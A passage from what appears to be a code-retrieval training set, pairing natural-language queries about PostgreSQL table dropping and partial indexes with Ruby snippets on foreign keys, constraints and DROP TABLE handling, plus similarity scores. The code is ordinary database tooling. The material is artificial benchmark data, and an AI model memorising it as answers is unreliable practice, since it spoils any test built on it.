"def add_concurrent_partitioned_foreign_key(source, target, column:, on_delete: :cascade, name: nil)\n assert_not_in_transaction_block(scope: ERROR_SCOPE)\n\n partition_options = {\n column: column,\n on_delete: on_delete,\n\n # We'll use the same FK name for all partitions and match it to\n # the name used for the partitioned table to follow the convention\n # used by PostgreSQL when adding FKs to new partitions\n name: name.presence || concurrent_partitioned_foreign_key_name(source, column),\n\n # Force the FK validation to true for partitions (and the partitioned table)\n validate: true\n }\n\n if foreign_key_exists?(source, target, **partition_options)\n warning_message = \"Foreign key not created because it exists already \" \\\n \"(this may be due to an aborted migration or similar): \" \\\n \"source: #{source}, target: #{target}, column: #{partition_options[:column]}, \"\\\n \"name: #{partition_options[:name]}, on_delete: #{partition_options[:on_delete]}\"\n\n Gitlab::AppLogger.warn warning_message\n\n return\n end\n\n partitioned_table = find_partitioned_table(source)\n\n partitioned_table.postgres_partitions.order(:name).each do |partition|\n add_concurrent_foreign_key(partition.identifier, target, **partition_options)\n end\n\n with_lock_retries do\n add_foreign_key(source, target, **partition_options)\n end\n end",
"def test_emailers_restrict_delete\n\t\terr = assert_raises PG::ForeignKeyViolation do\n\t\t\tDB.exec(\"DELETE FROM people WHERE id=7\")\n\t\tend\n\t\tassert err.message.include? 'emailers_person_id_fkey'\n\tend",
"def foreign_key_check\n @foreign_key_check ||= \"#{foreign_key}_previously_changed?\" if (stores_foreign_key? && foreign_key)\n end",
"def test_adding_pigs_to_the_farm_with_t_dot_references_farm_foreign_key_true\n premigrate\n table = \"pigs\"\n migrate table\n assert_match(/FOREIGN KEY \\(\\\"farm_id\\\"\\) REFERENCES \\\"farms\\\"\\(id\\)/, schema(table))\n end",
"def dump_foreign_key_migration(options=OPTS)\n ts = _dump_tables(options)\n <<END_MIG\nSequel.migration do\n change do\n#{ts.map{|t| dump_table_foreign_keys(t)}.reject{|x| x == ''}.join(\"\\n\\n\").gsub(/^/, ' ')}\n end\nend\nEND_MIG\n end",
"def constraint_name(table, field)\n \"fk_#{table}_#{field_list_name(field)}\"\n end",
"def foreign_key_for?(record)\n foreign_key = Array(reflection.foreign_key)\n foreign_key.all? { |key| record._has_attribute?(key) }\n end",
"def reflection_to_foreign_keys!( reflection, foreign_key_list )\n reflection_to_foreign_keys( reflection ).each do |foreign_key|\n #skip if already in this list or the fk has already been uped in the db\n next if includes_foreign_key?( foreign_key, foreign_key_list ) ||\n existing_foreign_key?( foreign_key )\n foreign_key_list << foreign_key\n end\n end",
"def supports_foreign_key_parsing?\n respond_to?(:foreign_key_list)\n end",
"def foreign_key\n association ? association.foreign_key : name\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n fks = ado_schema_foreign_keys(table).inject({}) do |memo, fk|\n name = m.call(fk['FK_NAME'])\n specs = memo[name] ||= {\n :columns => [],\n :table => m.call(fk['PK_TABLE_NAME']),\n :key => [],\n :deferrable => fk['DEFERRABILITY'],\n :name => name,\n :on_delete => fk['DELETE_RULE'],\n :on_update => fk['UPDATE_RULE']\n }\n specs[:columns] << m.call(fk['FK_COLUMN_NAME'])\n specs[:key] << m.call(fk['PK_COLUMN_NAME'])\n memo\n end\n fks.values\n end",
"def is_foreign_key?\n association.present?\n end",
"def add_foreign_key_to(model, *keys)\n # {{{\n keys.flatten! \n mapping = [ keys, model.__associations__.primary_keys[model.table_name] ]\n @foreign_keys[@accessor.table_name] = {} unless @foreign_keys[@accessor.table_name]\n @foreign_keys[@accessor.table_name][model.table_name] = mapping \n # Inherit foreign keys: \n @foreign_keys.update(model.__associations__.foreign_keys)\n end",
"def primary_key_and_all_references_to_uuid(table, seed: nil)\n fk_specs = foreign_keys_into(table)\n\n drop_foreign_keys(fk_specs)\n\n primary_key_to_uuid(table, seed: seed)\n\n fk_specs.each do |fk_spec|\n columns_to_uuid fk_spec[:from_table], fk_spec[:column], seed: seed\n end\n\n create_foreign_keys(fk_specs.deep_dup)\n end",
"def check_foreign_key(field)\n val = self.send(field)\n if val.is_a? ForeignKey\n add_foreign_key_message_to_errors(val)\n end\n end",
"def foreign_key\n association.foreign_key \n end",
"def test_adding_elephants_to_the_farm_with_t_dot_foreign_key_farm_dependent_delete\n premigrate\n table = \"elephants\"\n migrate table\n assert_match(/FOREIGN KEY \\(\\\"farm_id\\\"\\) REFERENCES \\\"farms\\\"\\(id\\) ON DELETE CASCADE/, schema(table))\n end",
"def create_constraints_statement(table_name, constraint_name, keys, foreign_table, foreign_keys, delete_constraint_type)\n <<-EOS.compress_lines\n ALTER TABLE #{quote_table_name(table_name)}\n ADD CONSTRAINT #{quote_constraint_name(constraint_name)}\n FOREIGN KEY (#{keys * ', '})\n REFERENCES #{quote_table_name(foreign_table)} (#{foreign_keys * ', '})\n ON DELETE #{delete_constraint_type}\n ON UPDATE #{delete_constraint_type}\n EOS\n end",
"def remove_foreign_key_constraint(table_name, options={})\n constraint_name = options[:name] || \"#{table_name}_ibfk_#{foreign_key}\"\n raise ArgumentError, \"You must specify the constraint name\" if constraint_name.blank?\n \n @connection.remove_foreign_key_constraint(table_name, constraint_name)\n end",
"def remove_table_not_exist_foreign_keys\n @foreign_keys.each do |table, foreign_keys|\n foreign_keys.delete_if do |key|\n if key.is_a?(String) && key =~ /_id$/\n class_name = Prepares.model_associations.get_association_class_name(table, key[0..-4])\n class_name ? !@table_nodes[class_name.gsub('::', '').tableize] : !@table_nodes[key[0..-4].pluralize]\n end\n end\n end\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n schema, _ = opts.fetch(:schema, schema_and_table(table))\n\n h = {}\n fklod_map = FOREIGN_KEY_LIST_ON_DELETE_MAP \n reverse = opts[:reverse]\n\n (reverse ? _reverse_foreign_key_list_ds : _foreign_key_list_ds).where_each(Sequel[:cl][:oid]=>regclass_oid(table)) do |row|\n if reverse\n key = [row[:schema], row[:table], row[:name]]\n else\n key = row[:name]\n end\n\n if r = h[key]\n r[:columns] << m.call(row[:column])\n r[:key] << m.call(row[:refcolumn])\n else\n entry = h[key] = {\n :name=>m.call(row[:name]),\n :columns=>[m.call(row[:column])],\n :key=>[m.call(row[:refcolumn])],\n :on_update=>fklod_map[row[:on_update]],\n :on_delete=>fklod_map[row[:on_delete]],\n :deferrable=>row[:deferrable],\n :table=>schema ? SQL::QualifiedIdentifier.new(m.call(row[:schema]), m.call(row[:table])) : m.call(row[:table]),\n }\n\n unless schema\n # If not combining schema information into the :table entry\n # include it as a separate entry.\n entry[:schema] = m.call(row[:schema])\n end\n end\n end\n\n h.values\n end",
"def drop_foreign_key_if_present(detached_partition, foreign_key)\n # It is important to only drop one foreign key per transaction.\n # Dropping a foreign key takes an ACCESS EXCLUSIVE lock on both tables participating in the foreign key.\n\n partition_identifier = qualify_partition_name(detached_partition.table_name)\n with_lock_retries do\n connection.transaction(requires_new: false) do\n next unless try_lock_detached_partition(detached_partition.id)\n\n # Another process may have already dropped this foreign key\n next unless PostgresForeignKey.by_constrained_table_identifier(partition_identifier).where(name: foreign_key.name).exists?\n\n connection.execute(\"ALTER TABLE #{connection.quote_table_name(partition_identifier)} DROP CONSTRAINT #{connection.quote_table_name(foreign_key.name)}\")\n\n Gitlab::AppLogger.info(message: \"Dropped foreign key for previously detached partition\",\n partition_name: detached_partition.table_name,\n referenced_table_name: foreign_key.referenced_table_identifier,\n foreign_key_name: foreign_key.name)\n end\n end\n end",
"def _foreign_key_list_ds\n @_foreign_key_list_ds ||= __foreign_key_list_ds(false)\n end",
"def foreign_key_setter\n # note: You can't check if this association stores foreign key\n # See HasOne and HasMany binding, they referenced foreign_key_setter\n @foreign_key_setter ||= \"#{foreign_key}=\" if foreign_key\n end",
"def collect_foreign_key_references(metadata, foreign_keys, row)\n schema = metadata.tableSchema\n\n # Add row as foreignKey source\n Array(schema ? schema.foreignKeys : []).each do |fk|\n colRef = Array(fk['columnReference'])\n\n # Referenced cells, in order\n cells = colRef.map {|n| row.values.detect {|cell| cell.column.name == n}}.compact\n cell_values = cells.map {|cell| cell.stringValue unless cell.stringValue.to_s.empty?}.compact\n next if cell_values.empty? # Don't record if empty\n (fk[:reference_from] ||= {})[cell_values] ||= row\n end\n\n # Add row as foreignKey dest\n Array(foreign_keys).each do |fk|\n colRef = Array(fk['reference']['columnReference'])\n\n # Referenced cells, in order\n cells = colRef.map {|n| row.values.detect {|cell| cell.column.name == n}}.compact\n fk[:reference_to] ||= {}\n cell_values = cells.map {|cell| cell.stringValue unless cell.stringValue.to_s.empty?}.compact\n next if cell_values.empty? # Don't record if empty\n log_error \"Table #{metadata.url} row #{row.number}(src #{row.sourceNumber}): found duplicate foreign key target: #{cell_values.map(&:to_s).inspect}\" if fk[:reference_to][cell_values]\n fk[:reference_to][cell_values] ||= row\n end\n end",
"def is_constraint?(trigger_definition)\n !!(trigger_definition =~ /^CREATE CONSTRAINT TRIGGER/)\n end",
"def scaf_foreign_keys\n scaf_belongs_tos.collect(&:primary_key_name)\n end",
"def create_constraints(drop = nil)\n contraints = {\n \"Page\" => [:page_id],\n \"Term\" => [:uri]\n }\n contraints.each do |label, fields|\n fields.each do |field|\n begin\n name = 'o'\n name = label.downcase if drop && drop == :drop\n query(\n \"#{drop && drop == :drop ? 'DROP' : 'CREATE'} CONSTRAINT ON (#{name}:#{label}) ASSERT #{name}.#{field} IS UNIQUE;\"\n )\n rescue Neography::NeographyError => e\n raise e unless e.message =~ /already exists/ || e.message =~ /No such constraint/\n end\n end\n end\n end",
"def conventional_foreign_key?\n parent_table == naming_conventions.parent_table_for(foreign_key)\n end",
"def foreign_key_column_exists?\n !! model_class.columns.detect { |c| c.name.strip.downcase == foreign_key_column_name.strip.downcase }\n end",
"def test_foreign_key_violations_on_insert_are_translated_to_specific_exception\n error = assert_raises(ActiveRecord::InvalidForeignKey) do\n insert_into_fk_test_has_fk\n end\n\n assert_not_nil error.cause\n end",
"def foreign_key(*attributes)\n self.foreign_keys += attributes\n end",
"def coerce_constraint_definition(defn)\n defn = coerce_symbolized_hash(defn)\n defn[:type] = coerce_name(defn[:type])\n \n case type = defn[:type]\n when :primary_key, :candidate_key\n has_exactly_hash_keys!(defn, :type, :attributes)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n when :foreign_key\n if defn.key?(:key)\n has_exactly_hash_keys!(defn, :type, :attributes, :references, :key)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n defn[:references] = coerce_name(defn[:references])\n defn[:key] = coerce_name(defn[:key])\n else\n has_exactly_hash_keys!(defn, :type, :attributes, :references)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n defn[:references] = coerce_name(defn[:references])\n end\n else\n invalid!(\"unknown constraint type #{type}\")\n end\n defn\n end"
] |
[
"0.7820092",
"0.7030612",
"0.7030612",
"0.68069375",
"0.677845",
"0.67621166",
"0.67621166",
"0.674389",
"0.6702672",
"0.66943294",
"0.66943294",
"0.661967",
"0.65737766",
"0.65495896",
"0.65211123",
"0.6496953",
"0.6462772",
"0.64350355",
"0.641176",
"0.6408627",
"0.6408627",
"0.6375203",
"0.6332843",
"0.6328469",
"0.62928754",
"0.6245146",
"0.6245146",
"0.62337047",
"0.622268",
"0.62082416",
"0.6202808",
"0.62022525",
"0.61982316",
"0.6193004",
"0.61910963",
"0.6175132",
"0.61710376",
"0.61440414",
"0.6101781",
"0.6082895",
"0.6082895",
"0.6007326",
"0.59885925",
"0.5982686",
"0.5940646",
"0.591689",
"0.5915288",
"0.5909184",
"0.5900809",
"0.5895258",
"0.5850669",
"0.5825423",
"0.5811268",
"0.5810178",
"0.5800245",
"0.5796475",
"0.57755864",
"0.5742172",
"0.57384354",
"0.5735755",
"0.57291335",
"0.57182795",
"0.56885535",
"0.56856936",
"0.56769484",
"0.5674375",
"0.5673104",
"0.5658986",
"0.56522936",
"0.5651424",
"0.5621732",
"0.5619935",
"0.5604043",
"0.5595496",
"0.5590376",
"0.55789447",
"0.5554833",
"0.5549577",
"0.55490196",
"0.5546519",
"0.55086434",
"0.55083907",
"0.5500649",
"0.54919064",
"0.54907835",
"0.5467625",
"0.54675674",
"0.54642624",
"0.54615796",
"0.5456547",
"0.54455686",
"0.54361606",
"0.5403899",
"0.5379813",
"0.53779525",
"0.5367765",
"0.534982",
"0.5328819",
"0.53261995"
] |
0.8199576
|
1
|
PostgreSQL supports DROP TABLE IF EXISTS
|
def supports_drop_table_if_exists?
true
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_drop_table_if_exists\n connection.create_table(:testings)\n assert connection.table_exists?(:testings)\n connection.drop_table(:testings, if_exists: true)\n assert_not connection.table_exists?(:testings)\n end",
"def drop_table_sql(name, options)\n \"DROP TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def drop_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"testdb\")\n c.exec \"DROP TABLE products;\"\n c.close\nend",
"def supports_drop_table_if_exists?\n supports_create_table_if_not_exists?\n end",
"def drop_table(table_name = temporary_table_name)\n ::RailsRedshiftReplicator.connection.exec \"drop table if exists #{table_name}\"\n end",
"def destroy!\n drop_ddl = tables.map(&:name).map do |t|\n \"drop table if exists #{t};\\n\"\n end.join\n ActiveRecord::Base.connection.execute(drop_ddl)\n end",
"def drop_table_statement(repository, model)\n \"DROP TABLE #{quote_table_name(model.storage_name(repository.name))}\"\n end",
"def drop_table?(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS\n if supports_drop_table_if_exists?\n options = options.merge(:if_exists=>true)\n names.each do |name|\n drop_table(name, options)\n end\n else\n names.each do |name|\n drop_table(name, options) if table_exists?(name)\n end\n end\n nil\n end",
"def drop_table(table_name, **options)\n schema_cache.clear_data_source_cache!(table_name.to_s)\n execute \"DROP#{' TEMPORARY' if options[:temporary]} TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_table_name(table_name)}#{' CASCADE' if options[:force] == :cascade}\"\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_identifier(name)}\"\n end",
"def drop(db)\n\tif $table_exists\n\t\tdb.execute(\"DROP TABLE items;\")\n\t\t$table_exists = false\n\t\tputs \"\\nTable successfully deleted.\"\n\telse\n\t\tputs \"\\nTable successfully deleted.\"\n\tend\nend",
"def drop!(db, colls = nil)\n db.in_transaction do |conn|\n schema_tables(conn).each do |table|\n conn.exec \"DROP TABLE IF EXISTS #{table}\"\n end\n end\n end",
"def drop_movies_table\n c = connect\n c.exec \"DROP TABLE IF EXISTS movies;\" \n c.close\nend",
"def delete_table\n table_name = self.to_s.pluralize.underscore\n DATABASE.execute(\"DROP TABLE #{table_name}\")\n end",
"def prepare_db_for_restore\n raise \"restore unimplemented for #{adapter}\" unless (adapter = @db_conf[:adapter]) == 'postgresql'\n query = \"SELECT table_name FROM information_schema.tables WHERE table_schema='public' AND table_type='BASE TABLE'\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n tables = `#{cmd}`\n\n query = \"DROP TABLE #{tables.map(&:chomp).map(&:strip).reject(&:empty?).join(\", \")} CASCADE\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n `#{cmd}`\n end",
"def destroy\n [METADATA_TABLE_NAME, RUN_HISTORY_TABLE_NAME,\n DISABLED_MONITOR_TABLE_NAME, MONITOR_INFO_TABLE_NAME].each do |table|\n @db.execute(\"DROP TABLE IF EXISTS #{table}\")\n end\n\n create()\n end",
"def drop_table\n self.connection.drop_table table_name\n end",
"def drop_tablespace(name, options = {})\n sql = 'DROP TABLESPACE '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << quote_tablespace(name)\n\n execute(\"#{sql};\")\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database(name) # :nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_versioned_table\n self.connection.drop_table versioned_table_name\n end",
"def dropUserTable(tableName)\n @conn.exec(\"DROP TABLE #{tableName}\")\n end",
"def drop_table?\n db.drop_table?(table_name)\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{name}\" \n end",
"def drop_and_create_schema_migrations_table\n sql = [\n \"USE #{@database}\",\n 'DROP TABLE IF EXISTS schema_migrations',\n 'CREATE TABLE schema_migrations ( version varchar(255) COLLATE utf8_unicode_ci NOT NULL, UNIQUE KEY unique_schema_migrations (version)) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci'\n ]\n\n run_commands(sql)\n end",
"def drop_table\n db.drop_table(table_name)\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE #{quote_table_name(name)}\"\n end",
"def drop_table(name)\n not_exist(name)\n\n ORM::DBConnection.new(model_name(name)).remove_table(name)\n File.delete(\"app/services/db/tables/#{name}.json\")\n end",
"def drop_schema_sql(name, opts=OPTS)\n \"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def dropUserTable\n @conn.exec(\"DROPE users\")\n end",
"def replace_statement(target, stage)\n <<-SQLREPLACE\n begin transaction;\n drop table #{target};\n alter table #{stage} rename to #{target};\n end transaction;\n SQLREPLACE\n end",
"def truncate_db\n drop_table\n create_table\n end",
"def purge\n @db.execute( \"DELETE FROM #{TABLE_NAME};\" )\n end",
"def create_cache_table(database_url_or_options = {}, options = {})\n @pg.exec(%{\n CREATE UNLOGGED TABLE #{@table_name} (\n key text UNIQUE NOT NULL,\n value bytea NULL\n );\n })\n return true\n end",
"def drop_tables!\n migrate(:down)\n end",
"def drop_table(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS \n names.each do |n|\n execute_ddl(drop_table_sql(n, options))\n remove_cached_schema(n)\n end\n nil\n end",
"def drop_table(tablename)\r\n raise(ArgumentError, 'Table name must be a symbol!') unless \\\r\n tablename.is_a?(Symbol)\r\n raise \"Table does not exist!\" unless table_exists?(tablename)\r\n @table_hash.delete(tablename)\r\n\r\n return @engine.delete_table(tablename)\r\n end",
"def delete_traps\n @db.execute(\"DROP TABLE Traps\")\n end",
"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def clear\n table_ = [keyspace, table].compact.join '.'\n statement = \"DROP TABLE IF EXISTS #{table_} ;\"\n session.execute(statement)\n end",
"def supports_create_table_if_not_exists?\n true\n end",
"def drop_table(*names)\n names.each {|n| execute(drop_table_sql(n))}\n end",
"def supports_create_table_if_not_exists?\n false\n end",
"def drop_sequence(name)\n self.execute(\"DROP TABLE IF EXISTS %s_sequence\" % name)\n end",
"def truncate_table\n\t\t\t transaction { connection.execute(\"TRUNCATE TABLE #{quoted_table_name};\") }\n\t\t end",
"def drop_prejoin_fact_table\r\n connection.drop_table(prejoined_table_name) if connection.tables.include?(prejoined_table_name)\r\n end",
"def setup_test_database\n connection = PG.connect(dbname: 'chitter_challenge_test')\n connection.exec(\"TRUNCATE peeps;\")\nend",
"def drop_view_sql(name, options)\n \"DROP VIEW#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def delete()\n db = PG connect( {dbname: 'bounty_hunter',\n host: 'localhost'\n })\n sql = 'DELETE from bounty_hunter'\n db.prepare('delete_one', sql)\n db.exec_prepared('delete_one', value)\n db.close()\nend",
"def sql_for_remove\n \"DROP FUNCTION IF EXISTS #{proname}(#{get_function_args})\"\n end",
"def reset\n tables = MODELS + [ENV['SCHEMA_TABLE']]\n tables.each { |t|\n DB << \"DROP TABLE IF EXISTS #{t.inspect};\"\n }\nend",
"def drop_schema(schema_name, options = {})\n execute \"DROP SCHEMA#{' IF EXISTS' if options[:if_exists]} #{quote_schema_name(schema_name)} CASCADE\"\n end",
"def drop_schema schema_name\n execute \"DROP SCHEMA #{schema_name} CASCADE\"\n end",
"def drop_table(klass)\n # Remove leftover data from some join tabkes.\n klass.relations.each do |rel|\n if rel.class.to_s == \"Og::JoinsMany\" and rel.join_table\n target_class = rel.target_class\n exec \"DELETE FROM #{rel.join_table}\"\n end\n end\n exec \"DROP TABLE #{klass.table}\"\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)}\"\n end",
"def delete_kiosks\n @db.execute(\"DROP TABLE Kiosks\")\n end",
"def set_up_test_database \n connection = PG.connect(dbname: 'chitter_peeps_test')\n #clear the peeps table\n connection.exec(\"TRUNCATE peeps;\")\nend",
"def drop_sql\n raise NotImplementedError, \"DatabaseSymbol should not be instanciated\"\n end",
"def delete_from_table(db,id,table_name)\n db.execute(\"DELETE FROM #{table_name} WHERE #{table_name}.id =#{id}\")\nend",
"def drop_all_tables!\n ActiveRecord::Base.descendants.each do |model|\n begin\n ActiveRecord::Schema.define do\n drop_table model\n end if model.table_exists?\n rescue\n end\n end and true\nend",
"def delete_table(table)\r\n referenced_by = references(table)\r\n if !referenced_by.empty?\r\n puts \"unable to delete table \\'#{table}\\' because it is referenced by table(s):\"\r\n referenced_by.each{|table_name| puts \"#{table_name}\"}\r\n false\r\n elsif table_exists?(table)\r\n delete_table_cmd = \"DROP TABLE IF EXISTS #{table}\"\r\n @db.execute(delete_table_cmd)\r\n puts \"#{table} was deleted\"\r\n true\r\n end\r\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)} CASCADE\"\n end",
"def drop_database_sql(name, opts = {})\n \"DROP DATABASE #{quote_identifier(name)}\"\n end",
"def down\n execute <<-SQL\n DROP TABLE event_registrations;\n SQL\n\n execute <<-SQL\n DROP TABLE members;\n SQL\n\n execute <<-SQL\n DROP TABLE events;\n SQL\n\n execute <<-SQL\n DROP TABLE treatment_logs;\n SQL\n\n execute <<-SQL\n DROP TABLE feeding_logs;\n SQL\n\n execute <<-SQL\n DROP TABLE employees;\n SQL\n\n execute <<-SQL\n DROP TABLE animals;\n SQL\n\n execute <<-SQL\n DROP TABLE tanks;\n SQL\n\n execute <<-SQL\n DROP TABLE habitats;\n SQL\n end",
"def delete_database(connection_string, db_name)\n drop_sql = <<-SQL\n DROP DATABASE #{db_name};\n SQL\n\n run \"#{connection_string} --execute=\\\"#{drop_sql}\\\"\"\nend",
"def remove_tables_from_publication(name, tables)\n typed_exec(\"ALTER PUBLICATION #{connection.quote_ident(name)} DROP TABLE #{safe_list(tables)}\")\n end",
"def resolve_ids_cleanup_sql(source, temptable)\n\t\tsource.connection.execute \"\n\t\tDELETE FROM unresolved_ids \n\t\t WHERE EXISTS (SELECT 1 FROM #{temptable} \n\t\t WHERE unresolved_id = unresolved_ids.id)\n\t\t AND source_id = #{source.id};\"\n\n\t\tsource.connection.execute \"DROP TABLE #{temptable}\"\n\tend",
"def delete_table(table_id); delete(\"tables/#{table_id}\"); nil; end",
"def db_remove\n \"DELETE\" + from_table_where + sql_match_conditions\n end",
"def drop\n\t\tActiveRecord::Base.connection.execute \"SET AUTOCOMMIT=0\"\n\t\tActiveRecord::Base.connection.execute \"SET FOREIGN_KEY_CHECKS=0\"\n\n self.change_schema_to 'information_schema';\n @result[:deleted] = []\n \n if request[:remove_all]\n #remove all tables\n @tables = ActiveRecord::Base.connection.select_all \"select TABLE_NAME table_name from `TABLES` where `TABLE_SCHEMA`='#{request[:db_name]}'\"\n self.change_schema_to request[:db_name];\n \n @tables.each do |table|\n ActiveRecord::Base.connection.execute \"drop table `#{table[\"table_name\"]}`\"\n @result[:deleted].push table[\"table_name\"];\n end\n else\n self.change_schema_to request[:db_name];\n ActiveRecord::Base.connection.execute \"drop table `#{request[:key]}`\";\n @result[:deleted].push request[:key];\n end\n \n self.change_schema_to 'information_schema';\n @result[:type] = 'table'\n render json: @result\n end",
"def delete table\n table = table.to_sym\n @lookup = @lookup.reject { |k, v| k == table }\n @schema = @schema.reject { |k, v| k == table }\n nil\n end",
"def delete_buttons\n @db.execute(\"DROP TABLE Buttons\")\n end",
"def delete_table instance_id, table_id\n execute do\n tables.delete_table(\n table_path(instance_id, table_id)\n )\n end\n end",
"def down\n drop_table TABLE_NAME\n end",
"def delete\n table_name = self.class.to_s.pluralize.underscore\n DATABASE.execute(\"DELETE FROM #{table_name} WHERE id = #{@id};\")\n end",
"def drop_sequence_statement(repository, property)\n \"DROP SEQUENCE IF EXISTS #{quote_column_name(sequence_name(repository, property))}\"\n end",
"def delete_queries\n [\n \"DROP TRIGGER tr_#{suffix} ON #{src_table};\",\n \"DROP FUNCTION fn_#{suffix}();\",\n \"DROP TRIGGER tr_#{suffix}_cleaner ON #{surveys_table};\",\n \"DROP FUNCTION fn_#{suffix}_cleaner();\"\n ]\n end",
"def create_table?(*args, &block)\n create_table(*args, &block) unless table_exists?\n end",
"def run\n ActiveRecord::Base.connection.create_table :not_deleted do |table|\n table.string :name\n end\n false\n end",
"def db_deleter(database, id)\n database.execute(\"DELETE FROM wine_cellar where id=#{id}\")\nend",
"def resetUntappdTable\n @db.execute \"DROP TABLE IF EXISTS #{@untappdTable};\"\n @db.execute <<-SQL\n CREATE TABLE \"#{@untappdTable}\" (\n id float,\n name varchar(40),\n brewery varchar(60),\n beer_label varchar(40),\n abv float,\n ibu float,\n style varchar(40),\n description varchar(60),\n rating_score float,\n rating_count float\n );\n SQL\n end",
"def unlink\n self.transaction do\n self.class.factory.model.connection.execute <<-SQL\n ALTER TABLE #{name} NO INHERIT #{self.class.factory.model.table_name};\n ALTER TABLE #{name} RENAME TO #{name}_unlinked;\n SQL\n self.destroy\n end\n end",
"def drop_function_sql(name, opts=OPTS)\n \"DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}\"\n end",
"def delete_table(db)\n\tputs ('Are you sure you want to wipe the table? (y/n)')\n\tif gets.chomp == 'y'\n\t\tdb.execute(\"DELETE FROM todo\")\n\t\tdb.execute(\"DELETE FROM log\") \n\tend\nend",
"def delete\n table_name = self.class.to_s.pluralize.underscore\n DATABASE.execute(\"DELETE FROM #{table_name} WHERE id = #{@id};\")\n end",
"def down\n \tdrop_table :solution_submissions\n\n # \texecute <<-SQL\n # \t\tDROP TYPE s_status;\n # \tSQL\n\n # \texecute <<-SQL\n # \t\tDROP TYPE lang;\n # \tSQL\n\n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def drop_table(table_name, options = {})\n table_name, options = extract_table_options(table_name, options)\n super(table_name, **options)\n end",
"def delete(sql, name = nil) end",
"def delete_table\n TinyDyno::Adapter.delete_table(table_name: self.table_name)\n end",
"def supports_create_table_if_not_exists?\n server_version >= 90100\n end",
"def drop_sequence_sql(name)\n \"DROP SEQUENCE #{name}\"\n end",
"def teardown_test_db\n ActiveRecord::Base.connection.tables.each do |t|\n ActiveRecord::Base.connection.drop_table(t)\n end\nend",
"def drop_view_sql(name, opts=OPTS)\n \"DROP #{'MATERIALIZED ' if opts[:materialized]}VIEW#{' IF EXISTS' if opts[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_index_sql(table, op)\n sch, _ = schema_and_table(table)\n \"DROP INDEX#{' CONCURRENTLY' if op[:concurrently]}#{' IF EXISTS' if op[:if_exists]} #{\"#{quote_identifier(sch)}.\" if sch}#{quote_identifier(op[:name] || default_index_name(table, op[:columns]))}#{' CASCADE' if op[:cascade]}\"\n end"
] |
[
"0.75406855",
"0.7447282",
"0.7352017",
"0.7257186",
"0.70561236",
"0.70199263",
"0.7016024",
"0.6948586",
"0.692693",
"0.69207895",
"0.69183964",
"0.68844426",
"0.68596363",
"0.68555564",
"0.68210626",
"0.67926085",
"0.6784143",
"0.6715057",
"0.6701895",
"0.66934294",
"0.6678893",
"0.6644413",
"0.6629832",
"0.6627834",
"0.65985215",
"0.65487885",
"0.65464425",
"0.6531216",
"0.64346707",
"0.6429133",
"0.6393106",
"0.6392981",
"0.63272536",
"0.63072056",
"0.62911576",
"0.62678427",
"0.6252546",
"0.6238612",
"0.6232385",
"0.6228497",
"0.61967397",
"0.61760646",
"0.616471",
"0.61316115",
"0.61201084",
"0.61179876",
"0.60794055",
"0.6030585",
"0.60291374",
"0.6016082",
"0.60159045",
"0.599908",
"0.5975881",
"0.59555686",
"0.59471136",
"0.5945929",
"0.5945211",
"0.59257483",
"0.5908614",
"0.5901338",
"0.5900731",
"0.5898081",
"0.58940965",
"0.5888433",
"0.58785766",
"0.58652365",
"0.58598775",
"0.58524907",
"0.5843604",
"0.58355373",
"0.5821793",
"0.5803052",
"0.5802927",
"0.57903004",
"0.57637644",
"0.5758638",
"0.5756406",
"0.5741043",
"0.5738358",
"0.57284963",
"0.57214457",
"0.5720815",
"0.5706246",
"0.56807363",
"0.56802183",
"0.5677386",
"0.5660743",
"0.56545347",
"0.5654072",
"0.56540436",
"0.56540436",
"0.5650332",
"0.5634317",
"0.56332994",
"0.5629638",
"0.5621985",
"0.56194186",
"0.5617826",
"0.5616626"
] |
0.7773049
|
1
|
PostgreSQL supports partial indexes.
|
def supports_partial_indexes?
true
end
|
{
"objective": {
